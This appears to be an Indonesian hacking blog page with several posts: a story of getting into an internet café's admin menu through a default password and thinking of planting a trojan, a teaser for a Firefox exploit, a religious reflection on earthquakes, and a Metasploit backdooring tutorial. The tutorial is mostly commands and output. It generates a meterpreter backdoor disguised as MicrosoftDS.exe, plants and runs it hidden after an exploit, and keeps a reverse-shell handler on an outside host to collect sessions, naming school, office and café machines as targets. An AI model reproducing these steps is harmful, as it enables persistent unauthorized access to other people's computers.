Iseng² di warnet ? BeX+ArtiConet DSL Router

Diposting oleh fitri-ariyanto on Sunday, November 17, 2013

--> [Sekilas Kisah]

Malam² mau pemilu bingung mau ngapain. Akhirnya aku putuskan buat ke warnet. Hmm,,skalian ada warnet baru, pengin nyobain ja.. ya buntut² cari tutorial sama chating..hehhe..maklum lah masih blom banyak yang dipikirin.. cewe pun ga punya (wakaka curhat neh…hehhe :) )

Gak tau kenapa ni warnet masih sepi², cm ada 2 client dan 3 nya aku. Waktu login personal ( kok pengen tau skuritinya ya..? ) ide konyol ini muncul dan pasti muncul stiap kali maen ke warnet hehe,..


[go to freak]

Hehe judulnya lucu.. apa artinya ? aku aja gak tau.. asal tulis aja..

Ok langsung saja,

1. ketika mu masukkin username ke personal, cek dulu apakah menu admin ada ? jika ada, mungkin kita bisa cek apa password defaultnya udah dig anti atau belom.. J.

Pilih menu Admin, masukkan password 008. jreng jreng jreng… kok ilang lagi ?wah brarti dah lumayan tu admin, passwd udah diganti. Klu kawan bruntung akan ada tampilan ini neh…

-------------------------

Sensor aja ya… J soalnya gak sempet n mungkin ga bisa di capture desktop nya… J, ada banyak setting buat klien jika saja menu Admin bisa kawan dapet. Enable Tool windows ( Task Manager, Cmd, Regedit, Control Panel ? dll) kebanyakan warnet men-disable tool tersebut, dan emang aku lagi beruntung kali ya ? bisa dapet .. heheh J. Klu udah puas sama itu, coba kluar menu admin dan login personal. Kita cek bagian yang laen..

2. login sudah sukses, mu lanjutin nge-net, chatting ? silahkan… hhehe tapi tutor ini intinya kayak pengamat security gitu dech.. heheh, tapi gua enggak lho ya…

kebetulan tadi menu / tool Windows sudah gua enable smua so, bagi yang udah dapet. Masuk command promt… ato CMD J

kita pengen tau di mana IP Address Routernya… gunakan perintah Tracert aja biar gampang ( mnurut saya lho ya..? jangan sirik J..)

contohnya lihat gambar..
-->
-->
Woow... terlihat disana.. bahwa kita men-trace yahoo.com, dan hasil trace kita melewat IP address 192.168.1.1 hehhe, dapet kan, routernya.. Coba kawan buka browser ( mozilla, opera, ato apalah) masukkan address IP tersebut..Klu saya dapat hasilnya seperti ini:


-->
-->
Oops… ada tuh, bisa lihat kan..? hehe.. hmmm gimana kalu kita tanem Trojan disana…? Heheh, biar suatu saat bisa masuk dengan leluasa…hheh ( tapi bisa gak ya….?)
Silahkan kawan experiment sendiri…
[Kesimpulan]
Dari tulisan diatas banyak banget inti dan kesimpulan yang dapet kita ambil. Bagi kawan sekalian yang pengin buka usaha warnet, jangan sepelakan hal² yang mungkin orang awam seperti saya tidak tahu.. J terutama keamanan dari jaringan tersebut, selain itu juga keamanan PC client. Untung ² kawan dapet user yang memang belum mengetahui banyak tentang computer atao newbie ( sama kaya saya..), klu dapet klient yang cerboh ? bisa ancur warnet anda.. jika anda yang mem-praktekkan, jangan iseng sama usaha orang, panggil adminnya, kasih tau klu ada yang gak beres sama skuritinya…
[Nambah]
Bagi yang udah master, cm pengin pesen.. maklum tulisan newbie so maaf klu udah basi. J hanya pengin share saja kok. Lagian Gua kan juga pengin usaha warnet .. hehehe
[Penutup]
Thanks to :
Warnet xxxxxx yang deket sama Papyros, ( tempat maen PS 2idaman gua)
Makasih udah gua uji coba.. J laen kali jangan sampe dapet user kaya saya..hehehe…
Special:
Allah SWT, atas karunia Nya. dan Rasulullah SAW.
SiNus Solo Ang. 2007
xcode, echo, jasakom, dll
Dan kawan sekalian yang nyempetin baca tulisan ini.
More aboutIseng² di warnet ? BeX+ArtiConet DSL Router

Here's that FBI Firefox Exploit for You (CVE-2013-1690)

Diposting oleh fitri-ariyanto

Hello fellow hackers,

I hope you guys had a blast at Defcon partying it up and hacking all the things, because ready or not, here's more work for you.  During the second day of the conference, I noticed a reddit post regarding some Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography. The security community was amazing: within hours, we found more information such as brief analysis about the payload, simplified PoC, bug report on Mozilla, etc. The same day, I flew back to the Metasploit hideout (with Juan already there), and we started playing catch-up on the vulnerability.


More aboutHere's that FBI Firefox Exploit for You (CVE-2013-1690)

Tutup Buku

Diposting oleh fitri-ariyanto on Friday, May 21, 2010

Maaf sodara-sodara, untuk beberapa saat ini mungkin blog ini tidak update lagi.Mohon maaf mungkin rekan2 kurang nyaman.. terimakasih bagi rekan2 yang bersedua komen2, kasih kritik, saran ide juga.

sementara blog yang dapat update http://usersonly.wordpress.com


salam,
xiNux3r
More aboutTutup Buku

Gempa dan Al Qur'an

Diposting oleh fitri-ariyanto on Friday, October 02, 2009

Sungguh sangat menyentuh hati jika kita menyimak lebih dalem tentang bencana yg terus menerus melanda negeri ini.Ada baiknya kita mulai belajar dan memahami apa arti di balik semua ini. Ya Allah, berikan kami perlindungan atas segala adzab dan siksa, tuntunlah kami ke Jalan MU ya ALLAH. Jalan yang lurus dan jalan orang-orang yang Allah beri Nikmat. dan bukan jalan orang-orang yang Sesat. Sadarkan kami dan negeri ini ya Allah.

Kejadiannya jam 17.16 wib yahh.. coba deh buka Alquran surat 17 ayat 16
yakni
Al-Isra ayat 16 :"Dan jika Kami hendak membinasakan suatu negeri, maka Kami perintahkan kepada orang-orang yang hidup mewah di negeri itu (supaya mentaati Allah) tetapi mereka melakukan kedurhakaan dalam negeri itu, maka sudah sepantasnya berlaku terhadapnya perkataan (ketentuan Kami), kemudian Kami hancurkan negeri itu sehancur-hancurnya.'

trus kan ada gempa susulan jam 17.38
coba aja liat Al-Isra surat 38:"Semua itu kejahatannya amat dibenci di sisi Tuhanmu."

kalo di Jambi gempanya jam 8.52 wib
nah isi dari surat al-Anfal ayat 52 (QS 8:52) yakni: "(Keadaan mereka) serupa dengan keadaan Firaun dan pengikut-pengikutnya serta orang-orang yang sebelumnya. Mereka mengingkari ayat-ayat Allah, maka Allah menyiksa mereka disebabkan dosa-dosanya. Sesungguhnya Allah Maha Kuat lagi Amat Keras siksaan-Nya."

Allah tried to remind us.......... Subhanallah
semoga dengan pertanda ini kita menjadi muslim yang lebih baik.. aminn

More aboutGempa dan Al Qur'an

Metasploit to backdooring

Diposting oleh fitri-ariyanto on Monday, May 11, 2009

May already have some of the metasploit that can be used to create a backdoor.
Use of this backdoor is very useful, especially as post-Exploitation method. At the time this example we will use the 2 basic methods to get the shell from the target, namely bind_tcp and reverse_tcp.
To bind_tcp, akan backdoor running on the target terget akan open the port on the system itself. So that after the exploitation process is complete, we can enter at any time to the target by using the port has been opened by the backdoor.


$ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
Length: 307
Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread


Backdoor will open a port on the 4321 target 10.10.96.143. How is the process running up to our backdoor, backdoor can be planted and executed after the process is complete exploitation of the target as follows:


msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780)

meterpreter > cd \
meterpreter > pwd
C:\
meterpreter > upload MicrosoftDS.exe
[*] uploading : MicrosoftDS.exe -> MicrosoftDS.exe
[*] uploaded : MicrosoftDS.exe -> MicrosoftDS.exe
meterpreter > execute -f MicrosoftDS.exe -H
Process 2348 created.


At the next time, we can go to the target machine without doing exploitation back, simply by opening the connection on the port that has been defined next.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4321
LPORT => 4321
msf exploit(handler) > set RHOST 10.10.96.143
RHOST => 10.10.96.143
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (10.10.97.14:58798 -> 10.10.96.143:4321)

meterpreter >



Second method uses reverse shell, reverse shell is used especially when the target network is limited by the firewall so that it can not open a connection to any port (typical internal network). So if you have the opportunity for hacking to a machine in the internal network (eg: computer school, computer office, computer cafe, etc) and still want to get shell access at any time and anywhere can take advantage of multi-handler to accept metasploit reverse shell. We can setup a multi-handler in the machinery that can be accessed from anywhere on the internet, for example: hosting machine, or server engine results rampokan, etc..


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > set LPORT 53
LPORT => 53
msf exploit(handler) > set LHOST 222.124.199.76
LHOST => 222.124.199.76
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler..


Then create a backdoor to live with reverse_shell category:


$ ./msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=222.124.199.76 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LPORT=53,LHOST=222.124.199.76,EXITFUNC=thread
$ file MicrosoftDS.exe
MicrosoftDS.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit


And when the run (run through the post-session exploitation or run manually via double-click the mouse razz), on a multi-handler will appear:


[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (222.124.199.76:53 -> 10.10.96.143:4831)

meterpreter >


Wow, using a multi-handler metasploit is we can have multiple sessions at once, for the above example can be seen a multi-handler that has been set ExitOnSession == false reverse_shell can menghandle many at once. And we can interact with the session-session at any time we want to:


msf exploit(handler) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
3 Meterpreter 222.124.199.76:53 -> 10.10.96.146:4831
4 Meterpreter 222.124.199.76:53 -> 10.10.96.223:4836
5 Meterpreter 222.124.199.76:53 -> 10.10.96.215:4838
6 Meterpreter 222.124.199.76:53 -> 172.16.96.143:4840
7 Meterpreter 222.124.199.76:53 -> 172.16.96.143:4845
8 Meterpreter 222.124.199.76:53 -> 172.16.96.143:4846
9 Meterpreter 222.124.199.76:53 -> 172.16.96.143:4847

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer: PROGWAR
OS : Windows XP (Build 2600, ).


That is some of the metasploit for example backdooring, many examples of other creative kiddies, especially the smell and evil-in-mind. Oh yes, in the example above I use the payload meterpreter many times. The discussion about meterpreter akan do next.
-----
thank'to:
echo, xcode, jasakom, mildnet, newhack etc..

copyleft@echo.or.id
More aboutMetasploit to backdooring